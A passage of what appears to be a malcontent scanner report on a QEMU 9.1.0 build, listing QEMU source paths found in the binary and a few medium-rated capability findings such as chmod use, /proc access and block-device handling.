[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_comm](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_comm&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_keyr](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_keyr&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tls-cipher-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftls-cipher-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscreds.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscreds.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsano](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsano&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredspsk](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredspsk&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsx50](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsx50&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory_ldst_c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory_ldst_c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/ram_addr.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fram_addr.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_aml_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_aml_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_dev_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_dev_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/vmgenid.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Fvmgenid.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/block/flash.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fblock%2Fflash.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/boards.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fboards.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/char/serial.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fchar%2Fserial.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/clock.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fclock.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/cpu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fcpu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/generic-lo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fgeneric-lo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/resetconta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fresetconta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/cluster.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcluster.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcore.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/display/i2c-ddc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fdisplay%2Fi2c-ddc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/elf_ops.h.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Felf_ops.h.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/fw-path-provide](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Ffw-path-provide&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/hotplug.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fhotplug.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/i2c/i2c.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fi2c%2Fi2c.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-pci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-sysbus](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-sysbus&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-bus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-bus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-dev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-dev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/intc/intc.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fintc%2Fintc.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ipack/ipack.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fipack%2Fipack.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/misc/vmcoreinfo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fmisc%2Fvmcoreinfo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nvram/fw_cfg.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnvram%2Ffw_cfg.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci-host/gpex.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci-host%2Fgpex.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_bridge.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_bridge.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_device.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_device.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_port.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_port.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/qdev-core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fqdev-core.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/resettable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fresettable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/event-loop-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fevent-loop-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/host_iommu_](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhost_iommu_&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/hostmem.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhostmem.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/iothread.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fiothread.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
